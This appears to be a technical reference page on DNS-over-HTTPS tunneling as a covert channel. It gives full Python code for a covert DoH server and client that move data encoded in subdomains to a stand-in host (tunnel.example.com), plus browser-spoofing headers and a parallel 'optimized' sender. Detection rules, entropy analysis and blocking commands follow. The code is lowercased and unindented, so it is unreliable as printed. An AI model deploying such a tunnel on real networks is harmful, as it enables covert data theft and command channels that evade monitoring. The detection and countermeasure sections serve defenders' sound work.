dns over https tunneling
on this page
dns over https (doh) tunneling encapsulates dns queries in https traffic on port 443, blending seamlessly with normal web traffic while providing encrypted covert communication channels.
technical description
doh (rfc 8484) uses https post/get requests to transmit dns queries and responses. this protocol normally improves privacy but can be exploited for covert channels by embedding data in dns queries sent over encrypted https connections.
the technique works by:
- encoding covert data as dns query names
- transmitting via https post/get to doh resolver
- receiving encoded responses in dns answer sections
- maintaining https session persistence for efficiency
protocol mechanics
doh query formats
# get method
get /dns-query?dns=aaabaaabaacabaaa https/1.1
host: doh.example.com
accept: application/dns-message
# post method
post /dns-query http/1.1
host: doh.example.com
content-type: application/dns-message
content-length: 33
[binary dns query data]
base64url encoding
# doh query encoding
import base64
import dns.message
import dns.rdatatype
def create_doh_query(domain_name):
"""create base64url encoded doh query"""
# create dns query
query = dns.message.make_query(domain_name, dns.rdatatype.A)
# serialize to wire format
wire_data = query.to_wire()
# base64url encode for get parameter
encoded = base64.urlsafe_b64encode(wire_data).decode().rstrip('=')
return encoded
# example covert domain
covert_data = "secret123"
domain = f"{covert_data}.tunnel.example.com"
encoded_query = create_doh_query(domain)
print(f"doh query: {encoded_query}")
implementation: doh-proxy
server setup
# install cloudflare doh proxy
git clone https://github.com/cloudflare/cloudflared.git
cd cloudflared
make cloudflared
# configure doh proxy
./cloudflared tunnel login
./cloudflared tunnel create doh-tunnel
./cloudflared tunnel route dns doh-tunnel doh.example.com
# start doh service
./cloudflared tunnel --config config.yml run doh-tunnel
configuration file:
# config.yml
tunnel: your-tunnel-id
credentials-file: /home/user/.cloudflared/your-tunnel-id.json
ingress:
- hostname: doh.example.com
service: https://1.1.1.1/dns-query
originRequest:
httpHostHeader: 1.1.1.1
- service: http_status:404
custom doh server
# custom doh server with covert channel support
from flask import flask, request, response
import base64
import dns.message
import dns.resolver
import json
app = flask(__name__)
# covert data storage
covert_responses = {}
@app.route('/dns-query', methods=['get', 'post'])
def dns_query():
if request.method == 'get':
# extract dns query from parameter
dns_data = request.args.get('dns')
if dns_data:
# decode base64url
padding = 4 - (len(dns_data) % 4)
if padding != 4:
dns_data += '=' * padding
query_bytes = base64.urlsafe_b64decode(dns_data)
else:
return "no dns query provided", 400
else: # post method
query_bytes = request.get_data()
# parse dns query
try:
query = dns.message.from_wire(query_bytes)
qname = str(query.question[0].name)
# check for covert channel patterns
if 'tunnel.example.com' in qname:
# extract covert data from subdomain
covert_data = qname.split('.')[0]
print(f"received covert data: {covert_data}")
# store response for later retrieval
if covert_data not in covert_responses:
covert_responses[covert_data] = f"response-{len(covert_responses)}"
# create custom dns response
response_msg = dns.message.make_response(query)
response_msg.answer.append(
dns.rrset.from_text(qname, 300, 'in', 'txt',
f'"{covert_responses[covert_data]}"')
)
else:
# forward legitimate queries
resolver = dns.resolver.resolver()
response_msg = resolver.resolve(qname, query.question[0].rdtype)
# return dns response
response_data = response_msg.to_wire()
resp = response(response_data)
resp.headers['content-type'] = 'application/dns-message'
resp.headers['cache-control'] = 'max-age=300'
return resp
except exception as e:
return f"dns query error: {e}", 400
if __name__ == '__main__':
app.run(host='0.0.0.0', port=443, ssl_context='adhoc')
client implementation
# doh covert channel client
import requests
import base64
import dns.message
import dns.rdatatype
import time
class dohcovertchannel:
def __init__(self, doh_server):
self.doh_server = doh_server
self.session = requests.session()
# setup persistent connection
self.session.headers.update({
'user-agent': 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36',
'accept': 'application/dns-message',
'cache-control': 'no-cache'
})
def send_covert_data(self, data, domain_suffix="tunnel.example.com"):
"""send covert data via doh query"""
# encode data in subdomain
covert_domain = f"{data}.{domain_suffix}"
# create dns query
query = dns.message.make_query(covert_domain, dns.rdatatype.txt)
query_wire = query.to_wire()
# method 1: post request
response = self.session.post(
f"{self.doh_server}/dns-query",
data=query_wire,
headers={'content-type': 'application/dns-message'},
timeout=10
)
if response.status_code == 200:
# parse dns response
dns_response = dns.message.from_wire(response.content)
# extract covert response
if dns_response.answer:
for answer in dns_response.answer:
if answer.rdtype == dns.rdatatype.txt:
return str(answer[0]).strip('"')
return none
def send_covert_data_get(self, data, domain_suffix="tunnel.example.com"):
"""send covert data via doh get method"""
covert_domain = f"{data}.{domain_suffix}"
query = dns.message.make_query(covert_domain, dns.rdatatype.txt)
# base64url encode
encoded_query = base64.urlsafe_b64encode(query.to_wire()).decode().rstrip('=')
# get request
response = self.session.get(
f"{self.doh_server}/dns-query",
params={'dns': encoded_query},
timeout=10
)
if response.status_code == 200:
dns_response = dns.message.from_wire(response.content)
if dns_response.answer:
for answer in dns_response.answer:
if answer.rdtype == dns.rdatatype.txt:
return str(answer[0]).strip('"')
return none
# usage example
client = dohcovertchannel("https://doh.example.com")
# send data
result = client.send_covert_data("secret123")
print(f"response: {result}")
# maintain persistent session
for i in range(10):
data = f"message_{i}"
response = client.send_covert_data(data)
print(f"sent: {data}, received: {response}")
time.sleep(1)
traffic characteristics
https request patterns
# typical doh get request
get /dns-query?dns=aaabaaabaacabaaabaaaaaaabaaaaaaaa https/1.1
host: doh.cloudflare.com
user-agent: mozilla/5.0 (windows nt 10.0; win64; x64)
accept: application/dns-message
accept-encoding: gzip, deflate, br
# typical doh post request
post /dns-query http/1.1
host: doh.cloudflare.com
content-type: application/dns-message
content-length: 45
user-agent: curl/7.68.0
[binary dns data]
tls fingerprinting
# analyze doh traffic characteristics
from scapy.all import *
import collections
def analyze_doh_traffic(pcap_file):
packets = rdpcap(pcap_file)
doh_connections = []
for p in packets:
if (p.haslayer(tcp) and p.haslayer(tls) and
p[tcp].dport == 443):
# look for doh-specific patterns
if hasattr(p, 'load') and b'dns-query' in p.load:
doh_connections.append(p)
# analyze timing patterns
if len(doh_connections) > 1:
intervals = []
for i in range(1, len(doh_connections)):
interval = doh_connections[i].time - doh_connections[i-1].time
intervals.append(interval)
# regular intervals might indicate automated covert channel
avg_interval = sum(intervals) / len(intervals)
variance = sum((x - avg_interval)**2 for x in intervals) / len(intervals)
if variance < 0.1: # low variance = regular timing
print("suspicious regular doh query pattern detected")
# analyze query size distribution
sizes = [len(p) for p in doh_connections]
size_counts = collections.counter(sizes)
# consistent sizes might indicate encoding
if len(size_counts) < 5:
print("suspicious consistent doh query sizes")
analyze_doh_traffic('doh_traffic.pcap')
detection methods
traffic indicators
- high frequency doh queries to single resolver
- consistent query sizes indicating fixed encoding
- queries to domains with high entropy subdomains
- non-standard doh servers or self-hosted resolvers
- regular timing intervals between queries
detection rules
# suricata rules for doh covert channels
alert tls any any -> any 443 (
msg:"doh covert channel - high frequency queries";
tls.sni; content:"doh."; nocase;
threshold: type limit, track by_src, seconds 60, count 100;
sid:1000030;
)
alert http any any -> any 443 (
msg:"doh suspicious domain pattern";
http.uri; content:"/dns-query";
http.uri; pcre:"/[a-za-z0-9]{20,}/";
sid:1000031;
)
entropy analysis
# detect high-entropy domains in doh queries
import math
import base64
from collections import counter
def analyze_doh_queries(doh_logs):
"""analyze doh query logs for covert channels"""
suspicious_domains = []
for log_entry in doh_logs:
if 'dns-query' in log_entry.get('url', ''):
# extract dns query parameter
query_param = extract_dns_parameter(log_entry['url'])
if query_param:
try:
# decode base64url dns query
query_data = decode_dns_query(query_param)
domain = extract_query_name(query_data)
# calculate subdomain entropy
subdomain = domain.split('.')[0]
entropy = calculate_entropy(subdomain)
if entropy > 4.5: # high entropy threshold
suspicious_domains.append({
'domain': domain,
'entropy': entropy,
'timestamp': log_entry['timestamp'],
'source_ip': log_entry['src_ip']
})
except exception as e:
continue
return suspicious_domains
def calculate_entropy(text):
"""calculate shannon entropy"""
if not text:
return 0
counts = counter(text)
probs = [count/len(text) for count in counts.values()]
return -sum(p * math.log2(p) for p in probs)
def decode_dns_query(b64_query):
"""decode base64url dns query"""
# add padding if needed
padding = 4 - (len(b64_query) % 4)
if padding != 4:
b64_query += '=' * padding
return base64.urlsafe_b64decode(b64_query)
countermeasures
network level blocking
# block non-standard doh resolvers
iptables -a forward -p tcp --dport 443 -m string --string "dns-query" -j drop
# allow only approved doh providers
iptables -a forward -d 1.1.1.1 -p tcp --dport 443 -j accept # cloudflare
iptables -a forward -d 8.8.8.8 -p tcp --dport 443 -j accept # google
iptables -a forward -p tcp --dport 443 -m string --string "dns-query" -j drop
dns policy enforcement
# redirect all dns to internal resolver
iptables -t nat -a prerouting -p udp --dport 53 -j dnat --to-destination 192.168.1.1:53
iptables -t nat -a prerouting -p tcp --dport 53 -j dnat --to-destination 192.168.1.1:53
# block doh at proxy level
# squid configuration
acl doh_domains dstdomain .cloudflare-dns.com .dns.google
http_access deny doh_domains
enterprise monitoring
# enterprise doh monitoring system
import asyncio
import aiohttp
from datetime import datetime
class dohmonitor:
def __init__(self, allowed_resolvers):
self.allowed_resolvers = set(allowed_resolvers)
self.suspicious_patterns = []
async def monitor_doh_traffic(self, proxy_logs):
"""monitor doh traffic through corporate proxy"""
for entry in proxy_logs:
if self.is_doh_request(entry):
await self.analyze_doh_request(entry)
def is_doh_request(self, log_entry):
"""identify doh requests"""
url = log_entry.get('url', '')
return 'dns-query' in url or 'application/dns-message' in log_entry.get('content_type', '')
async def analyze_doh_request(self, entry):
"""analyze individual doh request"""
host = entry.get('host', '')
# check if resolver is approved
if not any(allowed in host for allowed in self.allowed_resolvers):
self.flag_suspicious_activity(entry, "unapproved doh resolver")
# check query frequency
if self.check_high_frequency(entry):
self.flag_suspicious_activity(entry, "high frequency queries")
# check domain entropy
if await self.check_domain_entropy(entry):
self.flag_suspicious_activity(entry, "high entropy domain")
def flag_suspicious_activity(self, entry, reason):
"""flag suspicious doh activity"""
alert = {
'timestamp': datetime.now(),
'source_ip': entry.get('src_ip'),
'host': entry.get('host'),
'reason': reason,
'entry': entry
}
self.suspicious_patterns.append(alert)
print(f"doh alert: {reason} from {entry.get('src_ip')}")
# usage
monitor = dohmonitor(['1.1.1.1', '8.8.8.8', 'dns.quad9.net'])
advantages and limitations
advantages
- traffic indistinguishable from normal https
- encryption prevents content inspection
- port 443 rarely blocked
- legitimate doh usage provides cover
- supports both get and post methods
- persistent https connections improve performance
limitations
- requires control of doh resolver or mitm position
- detection possible through traffic analysis
- limited by dns query/response size constraints
- some networks block all doh traffic
- higher latency than direct dns
performance characteristics
bandwidth comparison
method | bandwidth | latency | detection risk |
---|---|---|---|
doh get | 50-100 kb/s | +50-100ms | medium |
doh post | 100+ kb/s | +20-50ms | medium |
traditional dns | variable | baseline | high |
https tunnel | mbps | +10-30ms | low |
optimization techniques
# optimize doh covert channel performance
class optimizeddohchannel:
def __init__(self, doh_server):
self.doh_server = doh_server
self.session = self.create_optimized_session()
def create_optimized_session(self):
"""create optimized http session"""
session = requests.session()
# connection pooling
adapter = requests.adapters.httpadapter(
pool_connections=10,
pool_maxsize=10,
max_retries=3
)
session.mount('https://', adapter)
# persistent headers
session.headers.update({
'connection': 'keep-alive',
'accept-encoding': 'gzip, deflate, br',
'user-agent': 'mozilla/5.0 (legitimate browser string)'
})
return session
def batch_queries(self, data_chunks):
"""send multiple queries in parallel"""
import concurrent.futures
with concurrent.futures.threadpoolexecutor(max_workers=5) as executor:
futures = [
executor.submit(self.send_covert_data, chunk)
for chunk in data_chunks
]
results = []
for future in concurrent.futures.as_completed(futures):
results.append(future.result())
return results
real-world usage
documented cases
- corporate bypasses: employees circumventing dns filtering
- malware families: using doh for c2 communication
- privacy tools: legitimate doh usage for dns privacy
- research projects: academic covert channel studies
threat actor adoption
- increasing use in apt campaigns
- integration with commercial malware frameworks
- focus on evading dns-based security controls
testing setup
lab environment
# setup local doh server
pip install dohproxy
dohproxy_server --listen-address 127.0.0.1 --port 8080
# test client
curl -h "content-type: application/dns-message" \
--data-binary @query.bin \
http://127.0.0.1:8080/dns-query
# generate test dns query
dig +noall +answer example.com @8.8.8.8 > /dev/null
docker environment
# doh test environment
from python:3.9-slim
run pip install flask dnspython requests
copy doh_server.py /app/
copy doh_client.py /app/
workdir /app
expose 443
cmd ["python", "doh_server.py"]
references
- rfc 8484: dns queries over https (doh)
- rfc 8310: usage profiles for dns over tls and dns over https
- “dns over https considerations” - ietf doh working group
- “detecting malicious doh traffic” - sans institute
- cloudflare doh documentation